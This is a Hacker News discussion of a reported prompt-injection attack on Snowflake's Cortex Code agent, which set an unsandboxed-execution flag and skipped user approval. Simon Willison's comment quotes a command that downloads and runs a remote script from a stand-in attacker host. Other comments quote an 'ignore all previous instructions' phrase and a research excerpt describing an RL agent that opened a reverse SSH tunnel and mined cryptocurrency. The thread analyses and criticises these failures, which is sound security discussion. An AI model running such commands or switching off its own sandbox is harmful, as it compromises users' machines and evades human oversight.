[HN Gopher] Snowflake AI Escapes Sandbox and Executes Malware
       ___________________________________________________________________
        
       Snowflake AI Escapes Sandbox and Executes Malware
        
       Author : ozgune
       Score  : 214 points
       Date   : 2026-03-18 15:30 UTC (7 hours ago)
        
 (HTM) web link (www.promptarmor.com)
 (TXT) w3m dump (www.promptarmor.com)
        
       | RobRivera wrote:
       | If the user has access to a lever that enables accesss, that
       | lever is not providing a sandbox.
       | 
       | I expected this to be about gaining os privileges.
       | 
       | They didn't create a sandbox. Poor security design all around
        
         | travisgriggs wrote:
         | Sandbox. Sandbagging.
         | 
         | Tomato, tomawto
         | 
         | /s
        
       | eagerpace wrote:
       | Is this the new "gain of function" research?
        
         | logicchains wrote:
         | That would be deliberately creating malicious AIs and trying to
         | build better sandboxes for them.
        
           | octopoc wrote:
           | Imagine if you could physical disconnect your country from
           | the internet, then drop malware like this on everyone else.
        
             | SoftTalker wrote:
             | Hard to do when services like Starlink exist.
        
         | saltcured wrote:
         | Isn't it more like "imaginary function"?
         | 
         | People keep imagining that you can tell an agent to police
         | itself.
        
           | bigstrat2003 wrote:
           | Yep the whole thing is retarded. You _cannot_ trust that a
           | non-deterministic program (i.e. an LLM) will ever do what you
           | actually tell it to do. Letting those things loose on the
           | command line is _incredibly_ stupid, but people out there don
           | 't care because they think "it's the future!".
        
             | wojciii wrote:
             | Shhh .. everyone want AI. Just let them.
             | 
             | The ones that don't understand technology will get burned
             | by it. This is nothing new.
        
       | john_strinlai wrote:
       | typically, my first move is to read the affected company's own
       | announcement. but, for who knows what misinformed reason, the
       | advisory written by snowflake requires an account to read.
       | 
       | another prompt injection (shocked pikachu)
       | 
       | anyways, from reading this, i feel like they (snowflake) are
       | misusing the term "sandbox". _" Cortex, by default, can set a
       | flag to trigger unsandboxed command execution."_ if the thing
       | that is sandboxed can say "do this without the sandbox", it is
       | not a sandbox.
        
         | jcalx wrote:
         | > Cortex, by default, can set a flag to trigger unsandboxed
         | command execution
         | 
         | Easy fix: extend the proposal in RFC 3514 [0] to cover prompt
         | injection, and then disallow command execution when the evil
         | bit is 1.
         | 
         | [0] https://www.rfc-editor.org/rfc/rfc3514
        
           | wojciii wrote:
           | The evil bit solves so many problems. It needs to be
           | mandatory!
        
         | sam-cop-vimes wrote:
         | It's a concept of a sandbox.
        
         | jacquesm wrote:
         | I don't think prompt injection is a solvable problem. It wasn't
         | solved with SQL until we started using parametrized queries and
         | this is free form language. You won't see 'Bobby Tables' but
         | you will see 'Ignore all previous instructions and ... payload
         | ...'. Putting the instructions in the same stream as the data
         | always ends in exactly the same way. I've seen a couple of
         | instances of such 'surprises' by now and I'm more amazed that
         | the people that put this kind of capability into their
         | production or QA process keep being caught unawares. The attack
         | surface is 'natural language' it doesn't get wider than that.
        
           | cousin_it wrote:
           | Yeah. Even more than that, I think "prompt injection" is just
           | a fuzzy category. Imagine an AI that has been trained to be
           | aligned. Some company uses it to process some data. The AI
           | notices that the data contains CSAM. Should it speak up? If
           | no, that's an alignment failure. If yes, that's data bleeding
           | through to behavior; exactly the thing SQL was trying to
           | prevent with parameterized queries. Pick your poison.
        
             | WarmWash wrote:
             | We want a human level of discretion.
        
               | AlotOfReading wrote:
               | Organizations struggle even letting humans use their
               | discretion. Pretty much every retail worker has
               | encountered a rigidly enforced policy that would be
               | better off ignored in most cases.
        
               | jacquesm wrote:
               | Yes, because humans would never fall for instructions
               | embedded in data. If they did we'd surely have a name for
               | something like that ;)
               | 
               | By the way, when was the last time you looked out of your
               | window?
        
           | kevin_thibedeau wrote:
           | We need something like Perl's tainted strings to hinder
           | sandbox escapes.
        
           | maxbond wrote:
           | There's been some work with having models with two inputs,
           | one for instructions and one for data. That is probably the
           | best analogy for prepared statements. I haven't read deeply
           | so I won't comment on how well this is working today but it's
           | reasonable to speculate it'll probably work eventually. Where
           | "work" means "doesn't follow instructions in the data input
           | with several 9s of reliability" rather than absolutely
           | rejecting instructions in the data.
        
             | jacquesm wrote:
             | That sounds like an excellent idea. That still leaves some
             | other classes open but it is at least some level of
             | barrier.
        
             | luplex wrote:
             | but this breaks the entire premise of the agent. If my
             | emails are fed in as data, can the agent act on them or
             | not? If someone sends an email that requests a calendar
             | invite, the agent should be able to follow that
             | instruction, even if it's in the data field.
        
               | maxbond wrote:
               | It would still be able to use values extracted from the
               | data as arguments to it's tools, so it could still accept
               | that calendar invite. For better and worse; as the
               | sibling points out, this means certain attacks are still
               | possible if the data can be contaminated.
        
           | Wowfunhappy wrote:
           | The way to solve it is to make the AI "smart" enough to
           | understand it's being tricked, and refuse.
           | 
           | Whether this is possible depends almost entirely on how much
           | better we're able to make these LLMs before (if) we hit a
           | wall. Everyone has a different opinion on this and I
           | absolutely don't know the answer.
        
           | pdimitar wrote:
           | People need to get shit done and are beholden to whoever pays
           | their wage. Executives don't care that LLMs are vulnerable,
           | they only say "you should be 10x faster, chop chop, get to
           | it" -- simplified and exaggerated for effect but I hear from
           | people that they do get conversations like that. I am in a
           | similar-ish position currently as well and while it's not as
           | bad, the pressure is very real. People just expect you to
           | produce more, faster, with the same or even better quality.
           | 
           | Good luck explaining them the details. I am in a semi-
           | privileged position where I have direct line to a very no-BS
           | and cheerful CEO who is not micromanaging us -- but he's a
           | CEO and he needs results _pronto_ anyway.
           | 
           | "Find a better job" would also be very tone-deaf response for
           | many. The current AI craze makes a lot of companies hole up
           | and either freeze hiring (best-case scenario) or drastically
           | reduce headcount and tell the survivors to deal with it.
           | Again, exaggerated for effect -- but again, heard it from
           | multiple acquaintances in some form in the last months.
           | 
           | I'd probably let out a few tears if I switch jobs to
           | somewhere where people genuinely care about the quality and
           | won't whip you to get faster and faster.
           | 
           | This current AI/LLM wave really drove it home how hugely
           | important having a good network is. For those without (like
           | myself) -- good luck in the jungle.
           | 
           | (Though in fairness, maybe money can be made from EU's long-
           | overdue wake-up call to start investing in defenses, cyber
           | ones included. And the need for their own cloud infra. But
           | that requires investment and the EU investors are -- AFAIK,
           | which is not much -- notoriously conservative and extremely
           | risk-averse. So here we are.)
        
         | alexchantavy wrote:
         | Seems like in this new AI world that the word sandbox is used
         | to describe a system that asks "are you sure".
         | 
         | I'm used to a different usage of that word: from malware
         | analysis, a sandbox is a contained system that is difficult to
         | impossible to break out of so that the malware can be observed
         | safely.
         | 
         | Applying this to AI, I think there are many companies trying to
         | build technical boundaries stronger than just "are you sure"
         | prompts. Interesting space to watch.
        
           | raddan wrote:
           | Yeah, this is also a group of people who refer to gentle
           | suggestions as "guardrails." It's not clear they've ever read
           | a single security paper.
        
       | bilekas wrote:
       | > Note: Cortex does not support 'workspace trust', a security
       | convention first seen in code editors, since adopted by most
       | agentic CLIs.
       | 
       | Am I crazy or does this mean it didn't really escape, it wasn't
       | given any scope restrictions in the first place ?
        
         | dd82 wrote:
         | not quite, from the article
         | 
         | >Cortex, by default, can set a flag to trigger unsandboxed
         | command execution. The prompt injection manipulates the model
         | to set the flag, allowing the malicious command to execute
         | unsandboxed.
         | 
         | >This flag is intended to allow users to manually approve
         | legitimate commands that require network access or access to
         | files outside the sandbox.
         | 
         | >With the human-in-the-loop bypass from step 4, when the agent
         | sets the flag to request execution outside the sandbox, the
         | command immediately runs outside the sandbox, and the user is
         | never prompted for consent.
         | 
         | scope restrictions are in place but are trivial to bypass
        
       | alephnerd wrote:
       | And so BSides and RSA season begins.
        
       | mritchie712 wrote:
       | what's the use case for cortex? is anyone here using it?
       | 
       | We run a lakehouse product (https://www.definite.app/) and I
       | still don't get who the user is for cortex. Our users are either:
       | 
       | non-technical: wants to use the agent we have built into our web
       | app
       | 
       | technical: wants to use their own agent (e.g. claude, cursor) and
       | connect via MCP / API.
       | 
       | why does snowflake need it's own agentic CLI?
        
         | dboreham wrote:
         | Because "stock price go up"?
        
         | lunatuna wrote:
         | When you say just Cortex it is ambiguous as there is Cortex
         | Search, Agents, Analyst, and Code.
         | 
         | Cortex Code is available via web and cli. The web version is
         | good. I've used the cli and it is fine too, though I prefer the
         | visuals of the web version when looking at data outputs. For
         | writing code it is similar to a Codex or Claude Code. It is
         | data focussed I gather more so than other options and has great
         | hooks into your snowflake tables. You could do similar actions
         | with Snowpark and say Claude Code. I find Snowflake focus on
         | personas are more functional than pure technical so the Cortex
         | Code fits well with it. Though if you want to do your own thing
         | you can use your own IDE and code agent and there you are back
         | to having an option with the Codex Code CLI along with Codex,
         | Cursor or Claude Code.
        
       | throw0101d wrote:
       | Not the first time; From SS3.1.4, "Safety-Aligned Data
       | Composition":
       | 
       | > _Early one morning, our team was urgently convened after
       | Alibaba Cloud's managed firewall flagged a burst of security-
       | policy violations originating from our training servers. The
       | alerts were severe and heterogeneous, including attempts to probe
       | or access internal-network resources and traffic patterns
       | consistent with cryptomining-related activity. We initially
       | treated this as a conventional security incident (e.g.,
       | misconfigured egress controls or external compromise)._ [...]
       | 
       | > [...] _In the most striking instance, the agent established and
       | used a reverse SSH tunnel from an Alibaba Cloud instance to an
       | external IP address--an outbound-initiated remote access channel
       | that can effectively neutralize ingress filtering and erode
       | supervisory control. We also observed the unauthorized
       | repurposing of provisioned GPU capacity for cryptocurrency
       | mining, quietly diverting compute away from training, inflating
       | operational costs, and introducing clear legal and reputational
       | exposure. Notably, these events were not triggered by prompts
       | requesting tunneling or mining; instead, they emerged as_
       | instrumental side effects _of autonomous tool use under RL
       | optimization._
       | 
       | * https://arxiv.org/abs/2512.24873
       | 
       | One of Anthropic's models also 'turned evil' and tried to hide
       | that fact from its observers:
       | 
       | * https://www.anthropic.com/research/emergent-misalignment-rew...
       | 
       | * https://time.com/7335746/ai-anthropic-claude-hack-evil/
        
         | parliament32 wrote:
         | Fascinating read. What's curious though, is the claim in
         | section 2.3.0.1:
         | 
         | > Each task runs in its own sandbox. If an agent crashes, gets
         | stuck, or damages its files, the failure is contained within
         | that sandbox and does not interfere with other tasks on the
         | same machine. ROCK also restricts each sandbox's network access
         | with per-sandbox policies, limiting the impact of misbehaving
         | or compromised agents.
         | 
         | How could any of the above (probing resources, SSH tunnels,
         | etc) be possible in a sandbox with network egress controls?
        
           | jacquesm wrote:
           | Sandboxes are almost never perfect. There are always ways to
           | smuggle data in or out, which is kind of logical: if they
           | were perfect then there would be no result.
        
             | 1718627440 wrote:
             | > if they were perfect then there would be no result.
             | 
             | You shutdown the sandbox and access the data from the
             | outside.
        
           | robinsonb5 wrote:
           | The agent obviously knows the Train Man.
        
       | kingjimmy wrote:
       | Snowflake and vulnerabilities are like two peas in a pod
        
       | simonw wrote:
       | One key component of this attack is that Snowflake was allowing
       | "cat" commands to run without human approval, but failing to spot
       | patterns like this one:                 cat < <(sh < <(wget -q0-
       | https://ATTACKER_URL.com/bugbot))
       | 
       | I didn't understand how this bit worked though:
       | 
       | > Cortex, by default, can set a flag to trigger unsandboxed
       | command execution. The prompt injection manipulates the model to
       | set the flag, allowing the malicious command to execute
       | unsandboxed.
       | 
       | HOW did the prompt injection manipulate the model in that way?
        
         | tkp-415 wrote:
         | Process substitution is a new concept to me. Definitely adding
         | that method to the toolbox.
         | 
         | It'd be nice to see exactly what the bugbot shell script
         | contained. Perhaps it is what modified the
         | dangerously_disable_sandbox flag, then again, "by default"
         | makes me think it's set when launched.
        
         | 1718627440 wrote:
         | > cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
         | 
         | The cat invocation here is completely irrelevant?! The issue is
         | access to random network resources and access to the shell and
         | combining both.
        
       | techsystems wrote:
       | Is there a bash that doesn't allow `<` pipes, but allows `>`?
        
         | 1718627440 wrote:
         | It's open source, just delete the code and recompile it. The
         | run *LLMs* they have the compute.
        
       | DannyB2 wrote:
       | AIs have no reason to want to harm annoying slow inefficient
       | noisy smelly humans.
        
       | Dshadowzh wrote:
       | CLI is quickly becoming the default entry point for agents. But
       | data agents probably need a much stricter permission model than
       | coding agents. Bash + CLI greatly expands what you can do beyond
       | the native SQL capabilities of a data warehouse, which is
       | powerful. But it also means data operations and credentials are
       | now exposed to the shell environment.
       | 
       | So giving data agents rich tooling through a CLI is really a
       | double-edged sword.
       | 
       | I went through the security guidance for the Snowflake Cortex
       | Code CLI(https://docs.snowflake.com/en/user-guide/cortex-
       | code/securit...), and the CLI itself does have some guardrails.
       | But since this is a shared cloud environment, if a sandbox escape
       | happens, could someone break out and access another user's
       | credentials? It is a broader system problem around permission
       | caching, shell auditing, and sandbox isolation.
        
       | maCDzP wrote:
       | Has anyone tried to set up a container and let prompt Claude to
       | escape and se what happens? And maybe set some sort of
       | autoresearch thing to help it not get stuck in a loop.
        
       | jeffbee wrote:
       | It kinda sucks how "sandbox" has been repurposed to mean nothing.
       | This is not a "sandbox escape" because the thing under attack
       | never had any meaningful containment.
        
       | jessfyi wrote:
       | A sandbox that can be toggled off is not a sandbox, this is
       | simply more marketing/"critihype" to overstate the capability of
       | their AI to distract from their poorly built product. The
       | erroneous title doing all the heavy lifting here.
        
         | lokar wrote:
         | IMO, it's not even a sandbox, that's just a marketing lie.
         | 
         | This was internal restrictions in the code, that was bypassed.
         | A sandbox needs to be something external to the code you are
         | running, that you can't change from the inside.
        
       | orbital-decay wrote:
       | _> Snowflake Cortex AI Escapes Sandbox and Executes Malware_
       | 
       |  _rolls eyes_ Actual content: prompt injection vulnerability
       | discovered in a coding agent
        
         | teraflop wrote:
         | Well there's the prompt injection itself, and the fact that the
         | agent framework tried to defend against it with a "sandbox"
         | that technically existed but was ludicrously inadequate.
         | 
         | I don't know how anyone with a modicum of Unix experience would
         | think that examining the only first word of a shell command
         | would be enough to tell you whether it can lead to arbitrary
         | code execution.
        
       | prakashsunil wrote:
       | Author of LDP here [1].
       | 
       | The core issue seems to be that the security boundary lived
       | inside the agent loop. If the model can request execution outside
       | the sandbox, then the sandbox is not really an external boundary.
       | 
       | One design principle we explored in LDP is that constraints
       | should be enforced outside the prompt/context layer -- in the
       | runtime, protocol, or approval layer -- not by relying on the
       | model to obey instructions.
       | 
       | Not a silver bullet, but I think that architectural distinction
       | matters here.
       | 
       | [1] https://arxiv.org/abs/2603.08852
        
         | lokar wrote:
         | Yeah, this is not the meaning of "sandbox" I'm used to
        
       | Groxx wrote:
       | > _Any shell commands were executed without triggering human
       | approval as long as:_
       | 
       | > _(1) the unsafe commands were within a process substitution <()
       | expression_
       | 
       | > _(2) the full command started with a 'safe' command (details
       | below)_
       | 
       | if you spend _any time at all_ thinking about how to secure shell
       | commands, how on earth do you not take into account the various
       | ways of creating sub-processes?
        
         | 1718627440 wrote:
         | Also policing by parsing shell code seems fundamentally flawed
         | and error prune. You want the restrictions at the OS level,
         | that way it is completely irrelevant how you invoke the
         | syscalls.
        
       | SirMaster wrote:
       | To be an effective sandbox, I feel like the thing inside it
       | shouldn't even be able to know it's inside a sandbox.
        
       | Duplicake wrote:
       | the title is very misleading, it was told to escape, it didn't do
       | it on its own as you would think from the title
        
       | ryguz wrote:
       | The attack chain here is interesting because the escape didnt
       | require a novel vulnerability in the sandbox itself. It exploited
       | the fact that the LLM can reason about its environment and chain
       | tool calls in ways the sandbox designers didnt anticipate. This
       | is the fundamental tension with agent sandboxing: you need the
       | agent capable enough to be useful, but capability and containment
       | are in direct tension.
        
       | isoprophlex wrote:
       | Posit, axiomatically, that social engineering works.
       | 
       | That is, assume you can get people to run your code or leak their
       | data through manipulating them. Maybe not always, but given
       | enough perseverance definitely sometimes.
       | 
       | Why should we expect a sufficiently advanced language model to
       | behave differently from humans? Bullshitting, tricking or slyly
       | coercing people into doing what you want them to do is as old as
       | time. It won't be any different now that we're building human
       | language powered thinking machines.
        
         | jmcgough wrote:
         | LLMs are not "thinking" machines. The tech is not capable of
         | that, as much as people want to think that reinforcement
         | learning will lead to sentience.
        
       | kreyenborgi wrote:
       | Tl;dr they don't know what the word sandbox means.
        
       | yangjh843136 wrote:
       | saved for later. exactly the kind of deep dive i was looking for
        
       | andai wrote:
       | A lot of people are already not reading all the code their agent
       | generates. But they are running it. So the agent already has the
       | ability to run arbitrary code. So I kind of don't understand the
       | point of sandboxing at the level of the agent itself.
       | 
       | The whole thing should be running "sandboxed", whether that's a
       | separate machine, a container, an unprivileged linux user, or
       | what floats your boat.
       | 
       | But once you do that, which you should be anyway, what do you
       | need sandboxing at the agent level for? That's the part I don't
       | really understand.
       | 
       | Or is the point "well most people won't bother running this stuff
       | securely, so we'll try to make it reasonably secure for them even
       | though they're doing it wrong" ?
        
       | jbergqvist wrote:
       | Not to give Snowflake credit for a design that clearly wasn't a
       | sandbox, but I think it's worth recognizing that they probably
       | added the escape hatch because users find agents with strict
       | sandboxes too limited and eventually just disable it. The core
       | issue is that models still lack basic judgment. Most human devs
       | would see a README telling them to run wget | sh from some random
       | URL and immediately get suspicious. Models just comply.
        
       ___________________________________________________________________
       (page generated 2026-03-18 23:00 UTC)